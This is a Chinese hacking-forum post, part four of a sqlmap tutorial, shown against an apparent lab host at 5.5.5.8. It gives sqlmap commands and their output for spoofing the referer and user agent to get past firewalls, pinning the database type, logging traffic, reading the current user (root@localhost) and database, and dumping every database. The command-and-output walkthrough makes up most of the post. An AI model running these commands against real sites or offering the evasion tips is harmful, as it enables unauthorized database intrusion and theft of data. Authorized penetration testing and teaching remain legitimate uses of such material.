切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
272 SQLMAP 4[复制链接]
发表于 2012-9-15 16:41:18 | 显示全部楼层 |!read_mode!
如果是HTTPS

使用–force-ssl参数

伪装

–referer=REFERER #定义来源
–random-agent #定义 agent 默认的是sqlmap/1.0-dev-dbce417 (http://sqlmap.org),很多防火墙吧这个关键字X了,直接输入就行 不需要定义数据

RE:

  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --referer=google.com --random-agent -v10
复制代码
[21:37:42] [TRAFFIC OUT] HTTP request [#1]:
GET /pen/news.php?id=1 HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 5.5.5.8
Referer: google.com
Pragma: no-cache
Cache-control: no-cache,no-store
Connection: close
定义数据库MYSQL默认一个数据库一个数据库的寻找 PG MSSQL MYSQL等等 如果定义数据库能加快效果
如:
  1. [16:14:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  2. '
  3. [16:14:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  4. [16:14:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
  5. r HAVING clause'
  6. [16:14:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
  7. ype)'
  8. [16:15:00] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  9. [16:15:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  10. [16:15:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
  11. [16:15:01] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  12. [16:15:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  13. [16:15:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
  14. [16:15:03] [INFO] testing 'Oracle AND time-based blind'
  15. [16:15:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
复制代码
指定
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --dbms=mysql
复制代码
定义操作系统–os=linux –os=windows自定义保存数据
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" -t 1
  2. root@Dis9Team:~# cat 1
  3. HTTP request [#1]:
  4. GET /pen/news.php?id=1 HTTP/1.1
  5. Accept-language: en-us,en;q=0.5
  6. Accept-encoding: gzip,deflate
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  8. User-agent: sqlmap/1.0-dev-dbce417 (http://sqlmap.org)
  9. Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
  10. Host: 5.5.5.8
  11. Pragma: no-cache
  12. Cache-control: no-cache,no-store
  13. Connection: close
复制代码
当前用户
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --current-user
  2. [21:50:19] [INFO] fetching current user
  3. current user:    'root@localhost'
复制代码
当前数据库
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --current-db
  2. [21:51:16] [INFO] fetching current database
  3. current database:    'pentest'
复制代码
自定义线程
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --threads=10
复制代码
获得全部数据库内容root@Dis9Team:~# sqlmap -u “http://5.5.5.8/pen/news.php?id=1″ –dump-all



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-28 09:09

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部